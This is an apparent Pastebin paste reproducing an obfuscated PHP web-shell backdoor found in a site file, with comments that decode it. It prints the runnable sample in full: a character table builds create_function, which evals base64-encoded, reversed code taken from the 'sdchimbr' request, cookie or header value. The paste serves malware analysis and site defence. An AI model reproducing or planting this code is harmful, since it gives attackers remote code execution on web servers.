Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- *
- * The virus was inside a file name imgedit-icons_prevv1.php
- * Uploaded by unknown way.
- * It is probably some kind of a bot due to the HTTP based commands.
- * It have infected functions.php with the following -
- * http://pastebin.com/npmhVNiN
- *
- * Translated by Yehonatan Tsirolnik
- *
- **/
- // Virus dictionary
- $caresser = 't';
- $cavernous = 't';
- $bomb = 'r';
- $denouement = '_';
- $atatwalker = 'Vl$O';
- $fading = '_';
- $cleat = 't"';
- $interferes = ';';
- $hoops = 'S';
- $longer = 'Q';
- $arthropods = '"())lm';
- $blustering = '[';
- $formalizing = 'rs';
- $diary = 't';
- $hurty = 'ag:)aa';
- $bartholemy = 's';
- $all = 'X';
- $lasttango = 'a';
- $archambault = 'Ir';
- $animal = 'Z';
- $arson = 'e($s';
- $fruitfulness = '$';
- $disposals = ')';
- $jamesy = 'm';
- $hieratic = '_';
- $coordinators = 'a"r_;re';
- $christoper = '$e bTpO';
- $evict = '4iBR';
- $anatomically = 'r';
- $darcy = '(';
- $lake = ';';
- $densest = 'v_';
- $far = '(';
- $indebted = 'R';
- $majesty = '"';
- $infest = '](ec';
- $cogent = 'YIe)ne';
- $creative = ']';
- $intimated = 'P';
- $fluffier = 'eH[sg$eB';
- $contemplates = '$u(';
- $disobeyed = '_[siou';
- $botanist = 'R';
- $carline = ')';
- $antenna = 'd';
- $aryn = 'R[Cr';
- $attributes = 'd';
- $alwyn = '(HTRiivi';
- $authenticity = 'b]Ur_S';
- $fiducial = 'sEc,Tf6';
- $lanna = 'bW';
- $ericka = 'I';
- $disowned = 'L';
- $hut = 'rcI"';
- $equipotent = ']';
- $blane = 'cv$eeT_U';
- $keenness = 'D';
- $fuselage = 'V"iTrvE$';
- $checkable = '_d^r';
- $examination = 'at$n"s';
- $looted = 'Ea(r?tf';
- $cool = '?"';
- $clam = 'ah)eJdd';
- $beribboned = 'm';
- $ashley = 'i';
- $directing = 'e';
- $falter = ')';
- $breadbox = 'Trag,';
- $initiator = '(';
- $brakeman = 'QE';
- $forth = 'i';
- $coneflower = 'e';
- $chow = 'h=HOns';
- $ciliate = 'yc';
- $fascist = 'io_D_Ms';
- $evidential = 'i';
- $depositor = ']';
- $franzen = '(';
- $maje = '(';
- $hydrochloric = 'M';
- $dispersive = 'SC';
- $devout = ':';
- $gourmet = 'Kce;ia=C[';
- $conferences = 'PtNHM$';
- $justifying = 'P';
- $escape = 'p';
- $delegating = ')';
- $engineer = ')';
- $legume = 'EsS)';
- $banjo = 'yK';
- $imagine = 'R';
- $cleanliness = 'S';
- $evita = '_eao';
- // End of dictionary
- // The line below translates to create_function
- $chilliness = $gourmet['1'] . $breadbox['1'] . $evita[1] . $evita['2'] . $conferences['1'] . $evita[1] . $evita['0'] . $looted[6] . $disobeyed['5'] . $chow[4] . $gourmet['1'] . $conferences['1'] . $gourmet['4'] . $evita['3'] . $chow[4];
- // Space - 0x20
- $litmus = $christoper['2'];
- //The line below does -
- //$andria = create_function(" ", "eval(array_pop(func_get_args()));")
- $andria = $chilliness($litmus, $evita[1] . $fuselage['5'] . $evita['2'] . $arthropods['4'] . $maje . $evita['2'] . $breadbox['1'] . $breadbox['1'] . $evita['2'] . $banjo['0'] . $evita['0'] . $escape . $evita['3'] . $escape . $maje . $looted[6] . $disobeyed['5'] . $chow[4] . $gourmet['1'] . $evita['0'] . $breadbox['3'] . $evita[1] . $conferences['1'] . $evita['0'] . $evita['2'] . $breadbox['1'] . $breadbox['3'] . $legume[1] . $maje . $legume['3'] . $legume['3'] . $legume['3'] . $gourmet['3']);
- // Call the lambada function
- // Arguments that are being passed to the function are:
- // E,Z,h,i,Z,[,I,],b,X,l,"$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["sdchimbr"])?$i["sdchimbr"]:(isset($i["HTTP_SDCHIMBR"])?$i["HTTP_SDCHIMBR"]:die);eval(strrev(base64_decode(strrev($a))));"
- // But, techincally due to the array_pop it only evals the php code written above in the brackets
- // The formatted php is -
- /*
- $i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
- $a = isset($i["sdchimbr"]) ? $i["sdchimbr"] : (isset($i["HTTP_SDCHIMBR"]) ? $i["HTTP_SDCHIMBR"] : die);
- eval(strrev(base64_decode(strrev($a))));
- */
- // Which translates to the nicer one -
- /*
- $i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
- if (isset($i["sdchimbr"])) {
- $a = $i["sdchimbr"];
- }
- else {
- if (isset($i["HTTP_SDCHIMBR"])) {
- $a = $i["HTTP_SDCHIMBR"];
- }
- else {
- die
- };
- }
- eval(strrev(base64_decode(strrev($a))));
- *
- * So the function below executes the code above
- *
- */
- $andria($legume[0], $animal, $chow['0'], $gourmet['4'], $animal, $gourmet['8'], $hut['2'], $depositor, $lanna['0'], $all, $arthropods['4'], $conferences[5] . $gourmet['4'] . $gourmet['6'] . $evita['2'] . $breadbox['1'] . $breadbox['1'] . $evita['2'] . $banjo['0'] . $evita['0'] . $beribboned . $evita[1] . $breadbox['1'] . $breadbox['3'] . $evita[1] . $maje . $conferences[5] . $evita['0'] . $imagine . $legume[0] . $brakeman['0'] . $blane[7] . $legume[0] . $cleanliness . $breadbox['0'] . $breadbox['4'] . $conferences[5] . $evita['0'] . $gourmet['7'] . $chow['3'] . $chow['3'] . $banjo['1'] . $hut['2'] . $legume[0] . $breadbox['4'] . $conferences[5] . $evita['0'] . $cleanliness . $legume[0] . $imagine . $fuselage[0] . $legume[0] . $imagine . $legume['3'] . $gourmet['3'] . $conferences[5] . $evita['2'] . $gourmet['6'] . $gourmet['4'] . $legume[1] . $legume[1] . $evita[1] . $conferences['1'] . $maje . $conferences[5] . $gourmet['4'] . $gourmet['8'] . $cool['1'] . $legume[1] . $clam['6'] . $gourmet['1'] . $chow['0'] . $gourmet['4'] . $beribboned . $lanna['0'] . $breadbox['1'] . $cool['1'] . $depositor . $legume['3'] . $cool['0'] . $conferences[5] . $gourmet['4'] . $gourmet['8'] . $cool['1'] . $legume[1] . $clam['6'] . $gourmet['1'] . $chow['0'] . $gourmet['4'] . $beribboned . $lanna['0'] . $breadbox['1'] . $cool['1'] . $depositor . $devout . $maje . $gourmet['4'] . $legume[1] . $legume[1] . $evita[1] . $conferences['1'] . $maje . $conferences[5] . $gourmet['4'] . $gourmet['8'] . $cool['1'] . $conferences[3] . $breadbox['0'] . $breadbox['0'] . $justifying . $evita['0'] . $cleanliness . $fascist[3] . $gourmet['7'] . $conferences[3] . $hut['2'] . $conferences['4'] . $fluffier['7'] . $imagine . $cool['1'] . $depositor . $legume['3'] . $cool['0'] . $conferences[5] . $gourmet['4'] . $gourmet['8'] . $cool['1'] . $conferences[3] . $breadbox['0'] . $breadbox['0'] . $justifying . $evita['0'] . $cleanliness . $fascist[3] . $gourmet['7'] . $conferences[3] . $hut['2'] . $conferences['4'] . $fluffier['7'] . $imagine . $cool['1'] . $depositor . $devout . $clam['6'] . $gourmet['4'] . $evita[1] . $legume['3'] . $gourmet['3'] . $evita[1] . $fuselage['5'] . $evita['2'] . $arthropods['4'] . $maje . $legume[1] . $conferences['1'] . $breadbox['1'] . $breadbox['1'] . $evita[1] . $fuselage['5'] . $maje . $lanna['0'] . $evita['2'] . $legume[1] . $evita[1] . $fiducial['6'] . $evict[0] . $evita['0'] . $clam['6'] . $evita[1] . $gourmet['1'] . $evita['3'] . $clam['6'] . $evita[1] . $maje . $legume[1] . $conferences['1'] . $breadbox['1'] . $breadbox['1'] . $evita[1] . $fuselage['5'] . $maje . $conferences[5] . $evita['2'] . $legume['3'] . $legume['3'] . $legume['3'] . $legume['3'] . $gourmet['3']);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement